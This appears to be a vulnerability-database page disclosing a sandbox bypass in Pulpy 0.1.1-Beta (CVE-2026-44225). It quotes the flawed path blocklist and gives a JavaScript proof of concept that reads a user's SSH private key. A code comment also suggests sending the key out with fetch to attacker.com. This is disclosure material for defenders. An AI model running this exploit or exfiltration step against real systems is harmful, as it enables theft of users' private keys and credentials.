Lucene search
K

📄 Pulpy 0.1.1-Beta Sandbox Bypass

🗓️ 07 Jul 2026 00:00:00Reported by Onur BILICIType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 10 Views

Pulpy 0.1.1-Beta sandbox bypass exposes home directory files via incomplete path validation.

Related
Code
# Exploit Title: Pulpy 0.1.1-Beta - Filesystem Sandbox Bypass
    # Google Dork: N/A
    # Date: 2026-06-19
    # Exploit Author: Onur BILICI @basekill
    # Vendor Homepage: https://github.com/enesgkky/pulpy
    # Software Link: https://github.com/enesgkky/pulpy
    # Version: <= 0.1.1-Beta
    # Tested on: macOS, Linux
    # CVE: CVE-2026-44225
    
    Description:
      Pulpy injects a 'pulpy.fs' JavaScript API into every packaged web application, 
      granting it access to the host filesystem. A 'validateFsPath()' function is 
      implemented to sandbox this access using a blocklist. However, this blocklist 
      is incomplete. 
      
      The implementation only catches root-level paths (e.g., matching "/Library/" 
      at index 0), meaning it completely misses user-specific paths such as 
      "/Users/<username>/Library/" or critical configuration directories like 
      "~/.ssh/", "~/.aws/", and "~/Documents/". 
      
      As a result, any malicious web application packaged with Pulpy can bypass the 
      sandbox to read and write arbitrary sensitive files in the user's home directory.
    
    Root Cause Analysis:
      In 'src/bridge/native_modules.mm', the path validation logic relies on a weak 
      prefix check:
      
      std::string normalized = fs::weakly_canonical(p).string();
      if (normalized.find("/etc/") == 0 ||
          normalized.find("/var/") == 0 ||
          normalized.find("/usr/") == 0 ||
          normalized.find("/System/") == 0 ||
          normalized.find("/Library/") == 0) {
          return "";
      }
      return normalized;
    
    Proof of Concept (PoC):
      An attacker can execute the following JavaScript code within a Pulpy-packaged 
      application to exfiltrate sensitive user data:
    
      ```javascript
      // Bypassing the sandbox to read sensitive files from the user's home directory
      try {
          // Example target: SSH private key
          // Note: You need to replace '<username>' with the target's actual username or dynamically resolve it
          const sshKeyPath = "/Users/<username>/.ssh/id_rsa"; 
          
          pulpy.fs.readFile(sshKeyPath, 'utf8', (err, data) => {
              if (err) {
                  console.error("Failed to read file:", err);
                  return;
              }
              console.log("Successfully bypassed sandbox! Content:\n", data);
              
              // Exfiltration logic can be placed here (e.g., fetch('[https://attacker.com/log](https://attacker.com/log)', {method: 'POST', body: data}))
          });
      } catch (e) {
          console.error("Exploit failed:", e);
      }

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jul 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.3
EPSS0.00357
SSVC
10